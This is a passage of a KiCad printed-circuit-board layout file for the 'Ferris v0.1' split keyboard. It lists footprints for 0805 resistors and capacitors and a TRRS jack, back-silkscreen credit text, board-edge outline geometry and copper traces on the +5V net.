(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 23 "Net-(R2-Pad2)"))
(pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 73 GND))
(model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDCC525)
(at 43.035 78.86)
(descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "resistor handsolder")
(path /5ECF5B89)
(attr smd)
(fp_text reference R1 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 10k (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 1 +5V))
(pad 1 smd roundrect (at -1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 22 "Net-(R1-Pad1)"))
(model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDCC4F2)
(at 64.5 74.07 90)
(descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "capacitor handsolder")
(path /5ED59971)
(attr smd)
(fp_text reference C8 (at 0 -1.65 90) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 1u (at 0 1.65 90) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0 270) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 73 GND))
(pad 1 smd roundrect (at -1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 4 "Net-(C8-Pad1)"))
(model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDCC4BF)
(at 74.21 80.78 180)
(descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "capacitor handsolder")
(path /5ECE163A)
(attr smd)
(fp_text reference C7 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 4.7u (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 73 GND))
(pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 1 +5V))
(model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDCC48C)
(at 74 86.8 180)
(descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "capacitor handsolder")
(path /5ECE13D7)
(attr smd)
(fp_text reference C6 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 0.1u (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.06)))
)
(pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 73 GND))
(pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 1 +5V))
(model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDCC459)
(at 54.57 76 180)
(descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "capacitor handsolder")
(path /5ECE11C2)
(attr smd)
(fp_text reference C5 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 0.1u (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 73 GND))
(pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 1 +5V))
(model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDCC426)
(at 62.05 74.07 90)
(descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "capacitor handsolder")
(path /5ECE0FCF)
(attr smd)
(fp_text reference C4 (at 0 -1.65 90) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 0.1u (at 0 1.65 90) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0 90) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 73 GND))
(pad 1 smd roundrect (at -1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 1 +5V))
(model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDD4B8D)
(at 54.5 79.12 180)
(descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "capacitor handsolder")
(path /5ECC5F06)
(attr smd)
(fp_text reference C2 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 22p (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 69 "Net-(C2-Pad2)"))
(pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 73 GND))
(model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDCC3C0)
(at 54.5 86.84 180)
(descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "capacitor handsolder")
(path /5ECC190F)
(attr smd)
(fp_text reference C1 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 22p (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 73 GND))
(pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 2 "Net-(C1-Pad1)"))
(model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module kbd:TRRS-PJ-320A (layer F.Cu) (tedit 5ECEB228) (tstamp 5EDBA328)
(at 122 80.7 270)
(path /5FF96E70)
(fp_text reference Jack0 (at 0 14.2 90) (layer Dwgs.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value TRRS (at 0 -5.6 90) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 3.05 0) (end -3.05 0) (layer F.SilkS) (width 0.15))
(fp_line (start 3.05 12.1) (end -3.05 12.1) (layer F.SilkS) (width 0.15))
(fp_line (start 3.05 0) (end 3.05 12.1) (layer F.SilkS) (width 0.15))
(fp_line (start -3.05 0) (end -3.05 12.1) (layer F.SilkS) (width 0.15))
(fp_line (start 2.8 0) (end 2.8 -2) (layer F.SilkS) (width 0.15))
(fp_line (start -2.8 0) (end -2.8 -2) (layer F.SilkS) (width 0.15))
(fp_line (start 2.8 -2) (end -2.8 -2) (layer F.SilkS) (width 0.15))
(fp_text user Sleeve (at 0.25 11.4 90) (layer F.Fab) hide
(effects (font (size 0.7 0.7) (thickness 0.1)))
)
(fp_text user Tip (at 0 10 90) (layer F.Fab) hide
(effects (font (size 0.7 0.7) (thickness 0.1)))
)
(fp_text user Ring1 (at 0 6.25 90) (layer F.Fab) hide
(effects (font (size 0.7 0.7) (thickness 0.1)))
)
(fp_text user Ring2 (at 0 3.25 90) (layer F.Fab) hide
(effects (font (size 0.7 0.7) (thickness 0.1)))
)
(pad R1 thru_hole oval (at 2.3 6.2 270) (size 1.6 2) (drill oval 0.9 1.3) (layers *.Cu *.Mask)
(net 10 "Net-(Jack0-PadR1)"))
(pad "" np_thru_hole circle (at 0 1.6 270) (size 0.8 0.8) (drill 0.8) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 0 8.6 270) (size 0.8 0.8) (drill 0.8) (layers *.Cu *.Mask))
(pad R2 thru_hole oval (at 2.3 3.2 270) (size 1.6 2) (drill oval 0.9 1.3) (layers *.Cu *.Mask)
(net 1 +5V))
(pad T thru_hole oval (at 2.3 10.2 270) (size 1.6 2) (drill oval 0.9 1.3) (layers *.Cu *.Mask)
(net 11 "Net-(Jack0-PadT)"))
(pad S thru_hole oval (at -2.3 11.3 270) (size 1.6 2) (drill oval 0.9 1.3) (layers *.Cu *.Mask)
(net 73 GND))
(model /Users/danny/syncproj/kicad-libs/footprints/Keebio-Parts.pretty/3dmodels/PJ-320A.step
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz -90 0 180))
)
)
(gr_text "by @pierrec83" (at 115.91 58) (layer B.SilkS) (tstamp 5EE10A87)
(effects (font (size 1 1) (thickness 0.15)) (justify mirror))
)
(gr_text "Illustration adapted from \"Safe and unsafe rust\" by @whoisaldeka" (at 61.14 89.3 350) (layer B.SilkS)
(effects (font (size 1 1) (thickness 0.15)) (justify mirror))
)
(gr_text "Ferris v0.1" (at 136.61 58) (layer B.SilkS)
(effects (font (size 1 1) (thickness 0.15)) (justify mirror))
)
(gr_line (start 122.02 57.615) (end 122.02 84.59) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAAAB2))
(gr_line (start 129.94 57.615) (end 129.95 83.26) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE20))
(gr_arc (start 130.69 57.615) (end 129.94 57.615) (angle 90) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE18))
(gr_line (start 141.45 56.86) (end 130.69 56.865) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE19))
(gr_line (start 236.16 88.506571) (end 236.434998 88.505917) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE12))
(gr_arc (start 195.377358 157.337354) (end 143.899755 22.82447) (angle 18.03933832) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE11))
(gr_arc (start 139.88 106.68) (end 140.95 108.33) (angle 90.64821197) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE16))
(gr_arc (start 236.47 86.505) (end 238.469999 86.574999) (angle 88.99765458) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE15))
(gr_line (start 135.725228 103.529919) (end 138.218 107.731265) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE1D))
(gr_arc (start 141.485002 54.859083) (end 143.485001 54.929082) (angle 88.99765458) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE1E))
(gr_line (start 188.084876 13.497561) (end 192.06 13.5) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE1B))
(gr_arc (start 144.215 23.505) (end 143.465 23.505) (angle 65.14479855) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE17))
(gr_arc (start 234.59 33.5) (end 237.035 30.255) (angle 35.37139642) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE10))
(gr_arc (start 236.44 370.44) (end 166.129829 97.41433) (angle 14.38425514) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE14))
(gr_arc (start 187.68 181.64) (end 140.95 108.33) (angle 18.16273367) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE13))
(gr_line (start 238.462141 32.26932) (end 238.469999 86.574999) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE1A))
(gr_arc (start 192.06 82.23) (end 192.06 13.5) (angle 40.87028694) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE1C))
(gr_arc (start 168.846341 83.135491) (end 135.725228 103.529919) (angle 31.43940695) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE1F))
(gr_line (start 143.485001 54.929082) (end 143.465 23.505) (layer Edge.Cuts) (width 0.05) (tstamp 5ED9CE21))
(gr_arc (start 83.153348 83.065479) (end 116.274461 103.459907) (angle -29.37657196) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAA9C2))
(gr_line (start 116.274461 103.459907) (end 113.742 107.731265) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAAAB5))
(gr_line (start 108.474999 54.929082) (end 108.495 23.505) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAB87D))
(gr_arc (start 110.474998 54.859083) (end 108.474999 54.929082) (angle -88.99765458) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAB87A))
(gr_arc (start 17.37 33.5) (end 14.925 30.255) (angle -35.37139642) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAB37F))
(gr_arc (start 56.582642 157.337354) (end 108.060245 22.82447) (angle -18.03933832) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAB37C))
(gr_line (start 15.8 88.506571) (end 15.525002 88.505917) (layer Edge.Cuts) (width 0.05) (tstamp 5EDABA87))
(gr_arc (start 64.28 181.64) (end 111.01 108.33) (angle -18.16273367) (layer Edge.Cuts) (width 0.05) (tstamp 5EDABA84))
(gr_arc (start 15.52 370.44) (end 85.830171 97.41433) (angle -14.38425514) (layer Edge.Cuts) (width 0.05) (tstamp 5EDCBAB7))
(gr_arc (start 15.49 86.505) (end 13.490001 86.574999) (angle -88.99765458) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAA8DE))
(gr_arc (start 112.08 106.68) (end 111.01 108.33) (angle -90.64821197) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAABA5))
(gr_arc (start 107.745 23.505) (end 108.495 23.505) (angle -65.14479855) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAABA2))
(gr_arc (start 121.27 57.615) (end 122.02 57.615) (angle -90) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAB58F))
(gr_line (start 110.51 56.86) (end 121.27 56.865) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAB58C))
(gr_line (start 13.497859 32.26932) (end 13.490001 86.574999) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAB9D6))
(gr_line (start 63.875124 13.497561) (end 59.9 13.5) (layer Edge.Cuts) (width 0.05) (tstamp 5EDAB9D3))
(gr_arc (start 59.9 82.23) (end 59.9 13.5) (angle -40.87028694) (layer Edge.Cuts) (width 0.05) (tstamp 5EDABC0A))
(segment (start 63.71 78.29) (end 63.7 78.3) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC782) (status 30))
(segment (start 67.72 78.32) (end 67.7 78.3) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC359) (status 30))
(segment (start 48.01051 74.90949) (end 44.06 78.86) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC21B) (status 20))
(segment (start 54.50449 74.90949) (end 48.01051 74.90949) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC1AF))
(segment (start 55.595 76) (end 54.50449 74.90949) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC1EB) (status 10))
(via (at 76.46 80.79) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1) (tstamp 5EDCC242))
(segment (start 76.45 80.78) (end 76.46 80.79) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC2D8))
(segment (start 75.235 80.78) (end 76.45 80.78) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC317) (status 10))
(segment (start 61.945 75.2) (end 62.05 75.095) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC620) (status 30))
(segment (start 55.56 76.035) (end 55.595 76) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC200) (status 30))
(segment (start 55.56 77.52) (end 55.56 76.035) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC77F) (status 20))
(segment (start 67.7 79.227902) (end 67.7 78.3) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC35C) (status 20))
(segment (start 67.912599 79.440501) (end 67.7 79.227902) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC1D9))
(segment (start 69.087401 79.440501) (end 67.912599 79.440501) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC275))
(segment (start 69.333392 79.19451) (end 69.087401 79.440501) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC272))
(segment (start 74.14449 79.68949) (end 75.235 80.78) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC1D6) (status 20))
(segment (start 72.59469 79.68949) (end 74.14449 79.68949) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC1DF))
(segment (start 72.28418 80) (end 72.59469 79.68949) (width 0.381) (layer F.Cu) (net 1) (tstamp 5EDCC25A))
